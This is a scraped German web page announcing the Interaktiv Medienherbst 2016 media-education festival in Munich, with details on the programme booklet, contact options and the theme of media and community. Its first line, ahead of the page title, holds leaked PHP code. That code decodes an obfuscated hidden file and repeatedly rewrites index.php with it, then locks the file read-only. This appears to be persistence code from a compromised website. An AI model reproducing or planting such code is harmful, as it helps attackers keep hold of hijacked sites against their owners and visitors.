$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } INTERAKTIV MEDIENHERBST 2016 – INTERAKTIV-FESTIVAL

coverDas Festival für Bildung in der digitalen Kultur ist das Eröffnungsevent des Medienherbstes 2016 und der Schirmherrschaft des Münchner Oberbürgermeisters Dieter Reiter.

Pünktlich zu Herbstbeginn erscheint das Programmheft des Interaktiv Medienherbstes. Die ca. 200 Veranstaltungen von um die 60 Partnern bieten im Medienherbst ein breites Spektrum an Workshops, Festival, Spielevents, Fortbildungen, Tagungen u.v.m.

Das Programmheft steht hier online zur Verfügung. Aktuelle Informationen erhält man auch über die Facebookseite des Netzwerks.

Per E-Mail an interaktiv@jff.de oder telefonisch unter 089.126653-0 können gedruckte Exemplare angefordert werden.

Themenschwerpunkt: WIR – MEDIEN & GEMEINSCHAFT

Medien verbinden Menschen. Über sie unterhalten und informieren wir uns, tauschen uns aus, vertreten unsere Standpunkte, tragen Konflikte aus, präsentieren unsere Ideen oder uns selbst und werden so für andere sichtbar. Medien dienen als Gemeinschafts- und Kommunikationsräume in unserer Gesellschaft und ermöglichen die Partizipation und Darstellung eines jeden.

Durch die technische Entwicklung ist der Zugang zu diesen digitalen Kommunikationsräumen so nah, einfach und schnell wie nie zuvor. Das Netz ist offen für alle und jeder trägt die notwendigen Werkzeuge, wie Kameras, Mikrofone, Software und Apps, jederzeit bei sich. Eine große Anzahl verschiedenster Sozialräume bildet sich in den Weiten des Internets, seien es private Räume, die den Austausch mit der
Familie, Freunden und Bekannten ermöglichen oder öffentlich und teilöffentliche Sozialräume, die die Diskussion mit Gleichgesinnten, Fremden oder Andersdenkenden zulassen. Es war noch sie so leicht, sich mit einer Vielzahl von Menschen in einem solchen Rahmen auszutauschen.